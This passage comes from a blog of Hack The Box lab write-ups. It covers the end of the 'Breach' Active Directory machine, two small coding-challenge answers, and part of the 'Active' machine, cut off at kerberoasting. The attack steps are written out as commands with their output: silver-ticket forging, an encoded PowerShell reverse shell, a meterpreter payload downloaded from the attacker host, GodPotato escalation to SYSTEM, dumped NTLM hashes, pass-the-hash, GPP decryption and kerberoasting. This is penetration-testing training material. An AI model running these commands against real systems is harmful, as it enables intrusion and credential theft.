Use the "--show" option to display all of the cracked passwords reliably
Session completed.

So we found another pair of “Trustno1“, leaving us another pair of credential:

user: svc_mssql
passwd: Trustno1

PS: SVC_MSSQL also don’t have password re-use case. So now. . .We BloodHound!!

Active Directory BloodHound

We already have 2 valid users, might as-well check maybe some vuln ACL or access we can abuse.

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap breachdc.breach.vl -u svc_mssql -p Trustno1 --bloodhound -c all --dns-server 10.129.11.224
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\svc_mssql:Trustno1 
LDAP        10.129.11.224   389    BREACHDC         Resolved collection methods: objectprops, acl, container, rdp, trusts, session, localadmin, dcom, group, psremote
LDAP        10.129.11.224   389    BREACHDC         Done in 0M 48S
LDAP        10.129.11.224   389    BREACHDC         Compressing output into /root/.nxc/logs/BREACHDC_10.129.11.224_2026-04-01_101118_bloodhound.zip

For Julia.Wong:

There’s nothing interesting, so let’s see the other one.

SVC_MSSQL:

This guy didn’t have any OOB at the moment, but quite dangerous due to having an SPN, leading to potential Administrator cache theft.

Another PS:

The two account we’ve compromised much can access: LDAP, SMB, MSSQL, RDP, etc.

So the next plan is to see if SVC_MSSQL can gain an impersonation, leading to further access on MSSQL (Test manually it’s weak) such as Admin, and get access into the box.

MSSQL Enumeration and Abuse

Much here we going to use:

NetExec
Impacket

┌──(kali㉿kali)-[~]
└─$ sudo netexec mssql breachdc.breach.vl -u svc_mssql -p Trustno1
MSSQL       10.129.11.224   1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       10.129.11.224   1433   BREACHDC         [+] breach.vl\svc_mssql:Trustno1

Logon

┌──(kali㉿kali)-[~]
└─$ sudo impacket-mssqlclient svc_mssql:Trustno1@breachdc.breach.vl -windows-auth
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
. . .[SNIP]. . .
ERROR(BREACHDC\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (BREACH\svc_mssql  guest@master)> enum_logins
name            type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
-------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa              SQL_LOGIN                 1          1               0             0            0              0           0           0           0   
BUILTIN\Users   WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   
SQL (BREACH\svc_mssql  guest@master)>

Let’s use the BloodHound SPN map suggestor.

So now I’m going to change SVC_MSSQL password into MD4 (NT) portion as logon with:

gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a

\n \n

\n\n \n

\n\n \n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n

	import hashlib
	password = "Passw0rd1"
	ntlm_hash = hashlib.new('md4', password.encode('utf-16le')).hexdigest()
	print(f"NTLM Hash: {ntlm_hash}")

\n\n\n

\n\n

\n view raw\n \n hash_convert.py\n \n hosted with ❤ by GitHub\n

\n","stylesheet":"https://github.githubassets.com/assets/gist-embed-62c2e4e96ba476b5.css"}" data-component-name="GitgistToDOM">

This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters

Show hidden characters

	import hashlib
	password = "Passw0rd1"
	ntlm_hash = hashlib.new('md4', password.encode('utf-16le')).hexdigest()
	print(f"NTLM Hash: {ntlm_hash}")

view raw hash_convert.py hosted with ❤ by GitHub

Just change the Password to “Trustno1“

sudo impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.129.11.224 -spn MSSQLSvc/breachdc.breach.vl:1433 Administrator

┌──(kali㉿kali)-[~]
└─$ sudo impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.129.11.224 -spn MSSQLSvc/breachdc.breach.vl:1433 Administrator 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ll
total 36
-rw-r--r-- 1 root root 1246 Apr  1 10:26 Administrator.ccache
drwxr-xr-x 2 root root 4096 Apr  1 10:12 bhce
. . .[SNIP]. . .

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache                                                  
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREACH.VL

Valid starting       Expires              Service principal
04/01/2026 10:26:12  03/29/2036 10:26:12  MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
        renew until 03/29/2036 10:26:12

And it’s pwned!

┌──(kali㉿kali)-[~]
└─$ sudo netexec mssql breachdc.breach.vl -u Administrator --use-kcache                       
MSSQL       breachdc.breach.vl 1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       breachdc.breach.vl 1433   BREACHDC         [+] breach.vl\Administrator from ccache (Pwn3d!)

With-out wasting time let’s uses it to gain access into the box:

┌──(kali㉿kali)-[~]
└─$ sudo netexec mssql breachdc.breach.vl -u Administrator --use-kcache -X "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwA. . .[SNIP]. . .kA"
MSSQL       breachdc.breach.vl 1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       breachdc.breach.vl 1433   BREACHDC         [+] breach.vl\Administrator from ccache (Pwn3d!)
[10:27:54] ERROR    Error when attempting to execute command via xp_cmdshell: timed out
. . .[SNIP]. . .

And we got shell (I’m not even logon)

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.15.169] from (UNKNOWN) [10.129.11.224] 58765
whoami
breach\svc_mssql
PS C:\Windows\system32> whoami
breach\svc_mssql
PS C:\Windows\system32> hostname
BREACHDC

Windows Privilege Escalation Enumeration

Bit surprised, that SVC_MSSQL gave this lot’s of dangerous access:

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
. . .[SNIP]. . .                                                    
Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

So let’s abuses it, easiet way would probably let Metasploit automate everything, or maybe manual God-Potato will do it.

Windows Privilege Escalation Attack

With Metasploit a bit failed but we’re good:

┌──(kali㉿kali)-[~]
└─$ sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.169 LPORT=9002 -f exe -o pwn.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7680 bytes
Saved as: pwn.exe

┌──(kali㉿kali)-[~]
└─$ sudo msfconsole -q -x "use exploit/multi/handler; set LHOST tun0; set LPORT 9002; set payload windows/x64/meterpreter/reverse_tcp; exploit"
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 9002
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.15.169:9002 
[*] Sending stage (232006 bytes) to 10.129.11.224
[*] Meterpreter session 1 opened (10.10.15.169:9002 -> 10.129.11.224:58851) at 2026-04-01 10:34:33 -0400

meterpreter > getuid
Server username: BREACH\svc_mssql
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: All pipe instances are busy. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > getsystem -t 4
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (RPCSS variant)
. . .[SNIP]. . .

So I did manual and re-trigger the MSV binary as SYSTEM:

github.com/BeichenDream/GodPotato/releases/

PS C:\programdata> iwr -uri http://10.10.15.169/pwn.exe -outfile pwn.exe
PS C:\programdata> .\pwn.exe
PS C:\programdata> iwr -uri http://10.10.15.169/GodPotato-NET4.exe -outfile gp.exe
PS C:\programdata> .\gp.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140717890338816
[*] DispatchTable: 0x140717892929400
[*] UseProtseqFunction: 0x140717892221744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\3e124021-f0a5-4fa9-ad1f-a5f229ebdf11\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000d802-1470-ffff-454a-506170a8979d
[*] DCOM obj OXID: 0xdc5a74c3ba86cd0f
[*] DCOM obj OID: 0x5bb30f5398954ac
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 912 Token:0x204  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2668
nt authority\system

PS C:\programdata> dir


    Directory: C:\programdata


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         2/10/2022  12:59 AM                Amazon                                                               
d-----          4/1/2026   1:53 PM                docker                                                               
d---s-         2/17/2022  10:26 AM                Microsoft                                                            
d-----         4/17/2025  12:40 AM                Package Cache                                                        
d-----         4/16/2025  11:23 PM                regid.1991-06.com.microsoft                                          
d-----          5/8/2021   8:20 AM                SoftwareDistribution                                                 
d-----          5/8/2021   9:36 AM                ssh                                                                  
d-----         9/15/2021   3:11 AM                USOPrivate                                                           
d-----          5/8/2021   8:20 AM                USOShared                                                            
d-----         4/16/2025  11:28 PM                VMware                                                               
-a----          4/1/2026   2:39 PM          57344 gp.exe                                                               
-a----          4/1/2026   2:33 PM           7680 pwn.exe                                                              


PS C:\programdata> .\gp.exe -cmd "cmd /c C:\programdata\pwn.exe"
[*] CombaseModule: 0x140717890338816
[*] DispatchTable: 0x140717892929400
[*] UseProtseqFunction: 0x140717892221744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\f71c58f9-ee28-402a-9ddc-bdad80222c9d\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00001c02-1a4c-ffff-827a-e184854e8372
[*] DCOM obj OXID: 0xf9d0cce26b8bb415
[*] DCOM obj OID: 0x6f622a7f1f5eff74
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 912 Token:0x204  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 6652

Then we can just hashdump!!

meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.15.169:9002 
[*] Sending stage (232006 bytes) to 10.129.11.224
[*] Meterpreter session 2 opened (10.10.15.169:9002 -> 10.129.11.224:58924) at 2026-04-01 10:40:26 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb948d32f7e896aa0d3934ec7a1b868:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:051e1c9e689e7e4c9fb7164433b9ba8e:::
Claire.Pope:1105:aad3b435b51404eeaad3b435b51404ee:407269bacd94665e972e2c61c1de7a15:::
Julia.Wong:1106:aad3b435b51404eeaad3b435b51404ee:b4c8a5ef4dd292edd06b613d2c518ddc:::
Hilary.Reed:1107:aad3b435b51404eeaad3b435b51404ee:39da4813065bd52215fb5614b956873b:::
Diana.Pope:1108:aad3b435b51404eeaad3b435b51404ee:ee1458cde3182d47514a107afd1236f2:::
Jasmine.Price:1109:aad3b435b51404eeaad3b435b51404ee:4c8c779f1e48435bb0bf235afd921988:::
George.Williams:1110:aad3b435b51404eeaad3b435b51404ee:8a3891bd96479611d4eec391ca592519:::
Lawrence.Kaur:1111:aad3b435b51404eeaad3b435b51404ee:2ed316bf52a9f155fc25440fae777d0f:::
Jasmine.Slater:1112:aad3b435b51404eeaad3b435b51404ee:6df17991ea82048f8f03734f1f4449c8:::
Hugh.Watts:1113:aad3b435b51404eeaad3b435b51404ee:656f2dbe61c431b5ca58a1a5001d51f6:::
Christine.Bruce:1114:aad3b435b51404eeaad3b435b51404ee:74eeaab55e418b6247ea35db833da742:::
svc_mssql:1115:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
BREACHDC$:1000:aad3b435b51404eeaad3b435b51404ee:dd953936e414a1c2e1b4e1a062aa4a22:::
meterpreter >

That’s it, we can just logon with the same Metasploit or even PTH with the hash dump as Administrator.

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap breachdc.breach.vl -u Administrator -H ebb948d32f7e896aa0d3934ec7a1b868
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\Administrator:ebb948d32f7e896aa0d3934ec7a1b868 (Pwn3d!)

labs.hackthebox.com/achievement/machine/2489228/766

Until next time and Happy Hacking, together we make the Internet more bleeding!

HTB Sudoking - Coding

Sulaiman — Tue, 31 Mar 2026 09:00:14 GMT

Sudoking (in C)

See who has claimed the blood for this challenge.

Question:

# take in the number
n = input()

# calculate answer


# print answer
print(n)

Answer:

#include 

int grid[9][9];

int valid(int row, int col, int num) {
    for (int i = 0; i < 9; i++) {
        if (grid[row][i] == num) return 0;
        if (grid[i][col] == num) return 0;
    }
    int r = (row / 3) * 3, c = (col / 3) * 3;
    for (int i = 0; i < 3; i++)
        for (int j = 0; j < 3; j++)
            if (grid[r+i][c+j] == num) return 0;
    return 1;
}

int solve() {
    for (int i = 0; i < 9; i++) {
        for (int j = 0; j < 9; j++) {
            if (grid[i][j] == 0) {
                for (int num = 1; num <= 9; num++) {
                    if (valid(i, j, num)) {
                        grid[i][j] = num;
                        if (solve()) return 1;
                        grid[i][j] = 0;
                    }
                }
                return 0;
            }
        }
    }
    return 1;
}

void parse() {
    char line[50];
    int row = 0;
    while (fgets(line, sizeof(line), stdin)) {
        if (line[0] == '+') continue;
        int col = 0;
        for (int i = 0; line[i] && col < 9; i++) {
            if (line[i] == '.') grid[row][col++] = 0;
            else if (line[i] >= '1' && line[i] <= '9') grid[row][col++] = line[i] - '0';
        }
        row++;
    }
}

void print_grid() {
    for (int i = 0; i < 9; i++) {
        if (i % 3 == 0) printf("+-------+-------+-------+\n");
        for (int j = 0; j < 9; j++) {
            if (j % 3 == 0) printf("| ");
            printf("%d ", grid[i][j]);
        }
        printf("|\n");
    }
    printf("+-------+-------+-------+\n");
}

int main() {
    parse();
    solve();
    print_grid();
    return 0;
}

Happy Hacking!

HTB Oddly Even - Coding

Sulaiman — Tue, 31 Mar 2026 08:39:46 GMT

Oddly Even

See who has claimed the blood for this challenge.

Question:

# take in the number
n = int(input())

# calculate answer


# print answer
print(answer)

Answer:

# take in the number
n = int(input())
if n % 2 == 0:
    print("even")
# calculate answer
else:
# print answer
    print("odd")

Happy Hacking!

HTB Active - Windows (Easy)

Sulaiman — Mon, 30 Mar 2026 05:09:29 GMT

From HTB: Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.

An easy Windows Active Directory machine that’s start with abusing SMB Anon account to gain SVC credential on XML files.

Turns-out that SVC gain Kerberoasting upon Administrator password.

Network Enumeration and Port Discovery

└─$ ping -c2 10.129.10.151
PING 10.129.10.151 (10.129.10.151) 56(84) bytes of data.
64 bytes from 10.129.10.151: icmp_seq=1 ttl=127 time=253 ms
64 bytes from 10.129.10.151: icmp_seq=2 ttl=127 time=254 ms

--- 10.129.10.151 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 252.922/253.350/253.778/0.428 ms

Let’s NMAP:

└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.10.151 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at 
Warning: 10.129.10.151 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.10.151
Host is up (0.25s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49162/tcp open  unknown
49166/tcp open  unknown
49169/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds

└─$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,3268-3269,5722,9389 -sC -sV 10.129.10.151 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for DC (10.129.10.151)
Host is up (0.25s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-30 04:36:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5722/tcp open  msrpc         Microsoft Windows RPC
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-30T04:37:31
|_  start_date: 2026-03-30T04:32:47
|_clock-skew: -8s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

SMB Anon Access Enumeration

After some enumeration, we can abuse *blank user as access to enumerate SMB shares, and we got READ access on some.

└─$ sudo netexec smb dc.active.htb -u '' -p '' --shares
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\:
SMB         10.129.10.151   445    DC               [*] Enumerated shares
SMB         10.129.10.151   445    DC               Share           Permissions     Remark
SMB         10.129.10.151   445    DC               -----           -----------     ------
SMB         10.129.10.151   445    DC               ADMIN$                          Remote Admin
SMB         10.129.10.151   445    DC               C$                              Default share
SMB         10.129.10.151   445    DC               IPC$                            Remote IPC
SMB         10.129.10.151   445    DC               NETLOGON                        Logon server share
SMB         10.129.10.151   445    DC               Replication     READ
SMB         10.129.10.151   445    DC               SYSVOL                          Logon server share
SMB         10.129.10.151   445    DC               Users

NetExec with Spider_plus module:

└─$ sudo netexec smb dc.active.htb -u '' -p '' --shares -M spider_plus
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\:
SPIDER_PLUS 10.129.10.151   445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.10.151   445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.10.151   445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.10.151   445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.10.151   445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.10.151   445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.10.151   445    DC               [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.10.151   445    DC               [*] Enumerated shares
SMB         10.129.10.151   445    DC               Share           Permissions     Remark
SMB         10.129.10.151   445    DC               -----           -----------     ------
SMB         10.129.10.151   445    DC               ADMIN$                          Remote Admin
SMB         10.129.10.151   445    DC               C$                              Default share
SMB         10.129.10.151   445    DC               IPC$                            Remote IPC
SMB         10.129.10.151   445    DC               NETLOGON                        Logon server share
SMB         10.129.10.151   445    DC               Replication     READ
SMB         10.129.10.151   445    DC               SYSVOL                          Logon server share
SMB         10.129.10.151   445    DC               Users
SPIDER_PLUS 10.129.10.151   445    DC               [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.10.151.json".
SPIDER_PLUS 10.129.10.151   445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.10.151   445    DC               [*] SMB Readable Shares:  1 (Replication)
SPIDER_PLUS 10.129.10.151   445    DC               [*] Total folders found:  22
SPIDER_PLUS 10.129.10.151   445    DC               [*] Total files found:    7
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size average:    1.16 KB
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size max:        3.63 KB

┌──(byt3㉿LAPTOP)-[~]
└─$ sudo cat /root/.nxc/modules/nxc_spider_plus/10.129.10.151.json
{
    "Replication": {
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "23 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "119 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "1.07 KB"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "533 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "2.72 KB"
        },
        "active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "22 B"
        },
        "active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "3.63 KB"
        }
    }
}

Let’s get that file.

└─$ sudo smbclient \\\\dc.active.htb\\Replication -U
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 17:37:44 2018
  ..                                  D        0  Sat Jul 21 17:37:44 2018
  active.htb                          D        0  Sat Jul 21 17:37:44 2018

                5217023 blocks of size 4096. 235631 blocks available
smb: \> cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 17:37:44 2018
  ..                                  D        0  Sat Jul 21 17:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 03:46:06 2018

                5217023 blocks of size 4096. 235631 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit

┌──(byt3㉿LAPTOP)-[~]
└─$ cat Groups.xml

GPP Password Recovery

Gaining that XML files, we got encrypted password strings, along with the username for further enumeration/attack.

After some research, that’s password strings is GPP protected, we can recover it with gpp-decrypt tool:

└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

Now we have a pair for further attack.

user: svc_tgs
passwd: GPPstillStandingStrong2k18

Kerberos Attack TGS Roasting to Administrator

With that credentials, turns-out we can do kerberoasting and gain Administrator hashes, and crack it locally.

└─$ sudo netexec ldap dc.active.htb -u svc_tgs -p GPPstillStandingStrong2k18 --kerberoasting out.hash
LDAP        10.129.10.151   389    DC               [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.10.151   389    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
LDAP        10.129.10.151   389    DC               [*] Skipping disabled account: krbtgt
LDAP        10.129.10.151   389    DC               [*] Total of records returned 1
